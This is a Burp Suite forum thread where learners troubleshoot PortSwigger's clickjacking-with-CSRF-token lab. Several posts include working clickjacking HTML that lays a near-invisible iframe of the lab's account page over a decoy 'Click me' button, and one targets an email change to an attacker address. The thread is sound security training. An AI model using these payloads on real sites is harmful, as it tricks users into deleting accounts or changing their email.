Burp Suite User Forum


Having issue signing into the "Basic Clickjacking with CSRF token protection" lab

Phil | Last updated: Jan 06, 2020 09:17PM UTC

I'm unable to even start the lab (https://portswigger.net/web-security/clickjacking/lab-basic-csrf-protected). The provided credentials, carlos/montoya, do not work for me. Any ideas?

Ben, PortSwigger Agent | Last updated: Jan 07, 2020 09:00AM UTC

Hi, I have just checked this lab and the credentials are working fine for me. Have you accidentally deleted the carlos/montoya user during the course of the lab?

Burp User | Last updated: Jan 07, 2020 02:52PM UTC

That was precisely it. I must have unknowingly clicked on Delete at some point. I'm now able to sign in but once I store the HTML and "View exploit", the Test Me button is not loading properly. Here is what I'm getting, https://imgur.com/a/7dUgtRs. Any assistance would be awesome.

Hannah, PortSwigger Agent | Last updated: Jan 07, 2020 02:52PM UTC

What values are you using for width and height? Have you tried adjusting the width, height, top and left values?

Burp User | Last updated: Jan 07, 2020 03:09PM UTC

This is what I have as far as the params.

<style>
    iframe {
        position:relative;
        width:$ 500px;
        height: $ 700px;
        opacity: $opacity;
        z-index: 0.0001;
    }
    div {
        position:absolute;
        top:$ 320px;
        left:$ 60px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://ac061faa1f6cc0c280ac415e00f80099.web-security-academy.net/account"></iframe>

Hannah, PortSwigger Agent | Last updated: Jan 07, 2020 03:11PM UTC

To start with, you will need to remove all the dollar signs that are present in your code. Your first z-index will need to be changed back to 2. You will need to change $opacity to an actual value. The suggested initial value is 0.1. Additionally, the victim will be using Chrome, so if you aren't already, you should be testing using that browser. Please let me know if these steps do not resolve your issue.

Burp User | Last updated: Jan 07, 2020 03:33PM UTC

Tyvm Hannah, Idk how the HTML code was so butchered lol. Appreciate the help!

Hannah, PortSwigger Agent | Last updated: Jan 07, 2020 04:03PM UTC

No problem. Enjoy the rest of the labs!

Matthieu | Last updated: Apr 14, 2020 07:20PM UTC

I am using the following values, and when I look at the preview in Chrome the text is covering the delete button, but it does not validate the challenge for some reason.

<style>
    iframe {
        position:relative;
        width:700px;
        height: 500px;
        opacity: 0.0001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:355px;
        left:60px;
        z-index: 1;
    }
</style>
<div>Test me</div>
<iframe src="https://accf1f211eb1ae9380fa2e0300f20051.web-security-academy.net/account"></iframe>

Hannah, PortSwigger Agent | Last updated: Apr 15, 2020 07:16AM UTC

Hi Matthieu, have you tried changing "Test me" to "Click me"?

Ahmet | Last updated: Apr 16, 2020 04:04AM UTC

Hi, I accidentally deleted the user Carlos and cannot log in now. Can you help?

Hannah, PortSwigger Agent | Last updated: Apr 16, 2020 07:03AM UTC

Hi Ahmet, if you wait about 15 minutes, the lab will expire and reset.

komal | Last updated: Aug 13, 2020 07:18AM UTC

Hi, I am using the below HTML code:

<style>
    iframe {
        position:top;
        width:500px;
        height: 700px;
        opacity: 0.0001;
        z-index: 2;
    }
    div {
        position:left;
        top:300px;
        left:60px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://acdb1f761ea8fe71804c0822000a00d5.web-security-academy.net/account"></iframe>

I am still unable to solve the lab.

komal | Last updated: Aug 13, 2020 07:24AM UTC

Basically, when I hover on it, the cursor is not changing to a hand indicating

Hannah, PortSwigger Agent | Last updated: Aug 13, 2020 09:41AM UTC

Hi Komal, have you followed along with the solution provided, or watched a video solution for reference?

Abishekraghav | Last updated: Aug 25, 2020 05:06PM UTC

Clickjacking Lab is not responding

Hannah, PortSwigger Agent | Last updated: Aug 26, 2020 08:16AM UTC

The labs reset after 15 minutes of inactivity. I can confirm that the lab is working as expected.

Bijackr | Last updated: Nov 19, 2020 03:21AM UTC

All clickjacking labs are working fine for me, but when I test my exploit in Chrome it always detects it. I have tried different opacity levels too, but Chrome still says "unauthorized". Is there any way to perform clickjacking in Chrome? Hannah?

Hannah, PortSwigger Agent | Last updated: Nov 19, 2020 10:03AM UTC

Hi. The "victim" is using an older (outdated) version of Chrome so it will work on their browser (allowing you to solve the lab). The "Test exploit" button does work on the built-in Chromium browser in Burp, as well as other browsers, so you could use a different browser to line up the components before delivering your exploit. Just copy and paste your URL into a different browser.

Hannah, PortSwigger Agent | Last updated: Nov 24, 2020 03:46PM UTC

Hi, had you logged into the lab account (carlos:montoya) in the browser you're using to test, so that there is a valid session when you test your exploit?

Andrea | Last updated: Jan 06, 2021 05:42PM UTC

Hi, all clickjacking labs are not working fine for me. I deliver the content, and the exploit seems good, but the lab is not solved. I use Chrome. In the view exploit the "Click me" and "Change email" are perfectly aligned. What's the problem? Thanks

<style>
    iframe {
        position:relative;
        width: 700px;
        height: 500px;
        opacity: 0.0001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:440px;
        left:80px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://ac1a1fe11e95a23b807a9085009600fc.web-security-academy.net/email?email=hacker@attacker-website.com"></iframe>

Andrea | Last updated: Jan 06, 2021 05:56PM UTC

Solved by changing browser from Chrome to Edge. I don't know why...

Prakhar | Last updated: Jun 05, 2021 12:25PM UTC

<style>
    iframe {
        position:relative;
        width:500px;
        height: 700px;
        opacity: 0.1;
        z-index: 2;
    }
    div{
        position:absolute;
        top:400px;
        left:60px;
        z-index:1;
    }
</style>
<div>click me</div>
<iframe src="https://ac331fa91f7aee0e808b90b000d20090.web-security-academy.net/my-account"></iframe>

I am facing the problem with clickjacking even though I am using the Chrome browser.

Prakhar | Last updated: Jun 05, 2021 12:26PM UTC

I have accidentally deleted the user, but after some time, when the lab reset, I tried again, but it's not working even after delivering the exploit to the victim.

Hannah, PortSwigger Agent | Last updated: Jun 07, 2021 08:17AM UTC

Hi, could you tell me the title of the lab you are having issues with? Is it still the "Basic Clickjacking with CSRF token protection" lab?

Gustavo | Last updated: Jul 15, 2021 12:25AM UTC

Hi, I am having some trouble solving this challenge. I already made all the adjustments and I tried to submit the solution in different browsers (Firefox, Edge and Brave), but I cannot figure out what is going on. Could you please help me?

<style>
    iframe {
        position:relative;
        width:500px;
        height: 700px;
        opacity: 0.0001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:500px;
        left:55px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://target-acc31f301e33dafa803938f000bf00c1.web-security-academy.net/my-account?id=wiener"></iframe>

Michelle, PortSwigger Agent | Last updated: Jul 22, 2021 02:57PM UTC

Thanks for your message. Keep trying, you're definitely getting close :) The victim will be using Chrome, so it's best to test the exploit using that browser. Also, double-check the URL you're adding to make sure it matches the general account page for your specific lab https://<Your_Lab_ID>.web-security-academy.net/my-account in case there are any typos in the URL as this will change the next time you try the lab. You might find this video created by one of the users in our community useful too: https://www.youtube.com/watch?v=cdswOMjPpDo Have fun!
